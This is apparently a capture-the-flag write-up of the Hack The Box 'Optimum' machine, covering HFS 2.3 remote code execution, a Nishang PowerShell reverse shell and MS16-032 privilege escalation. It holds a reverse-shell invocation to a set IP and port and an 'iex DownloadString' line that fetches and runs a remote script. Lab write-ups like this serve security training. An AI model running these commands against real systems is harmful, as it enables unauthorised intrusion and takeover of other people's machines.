HTB Optimum Write-up (Windows) - Powershell Download String, HFS File Server 2.3 Vuln, Sherlock
- 1 liner
This exploit worked but IPPSec's walkthrough video does it in better way.
The HFS file server uses rejetto language
The 2.3 version is vulnerable for remote code execution.
We can execute command with following syntax accoding to the wiki page:
exec | A
ask system to run file A, eventually with parameters. If you need to use the pipe, then use macro quoting.
Optional parameter out will let you capture the console output of the program in the variable specified by name.
Optional parameter timeout will specify the max number of seconds the app should be left running.
We can confirm this by typing:
and set up the tcpdump to listen for any command execution: (NEW)
tcpdump -i tun0
This shows that it's exploitable.
Windows have 32bit and 64 bit versions. For file systems:
- 2.c:\Windows\SysWow64 -> this is still 32bit
- 3.C:\Windows\SysNative -> this is 64 bit
So we will try the 64 bit.
Once confirmed, we can use a toolset called "Nishang" > shells > PoweShellTcp.ps1 and copy it to somewhere else as we need to modify it a bit.
At the end of the script, we need to add one sentence:
Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.125 -Port 4444
And run nc for that port specified.
Finally, we can download the file on the File Server by typing:
And now we get the usershell!
With this method, we can download a priv esc scripts?
Since we are already running powershell on the server, let's use a native tool called sherlock.
Edit the Sherlock script, and add a method we want to use at the end of the script:
In this case, Find-AllVulns
We see it's vulnerable to 3 exploits!
- MS16-032, MS16-034, MS16-135
At the end of the script, edit
Invoke-MS16032 -Command "iex(New-Object Net.WebClient).DownloadString('http://192.168.119.188:80/shell.ps1')"
transfer over the TCP reverse shell Ps1 script (nishang) to the same directory and edit the port to something other the last one and start the python http server to host them
Run the nc on the port before running it.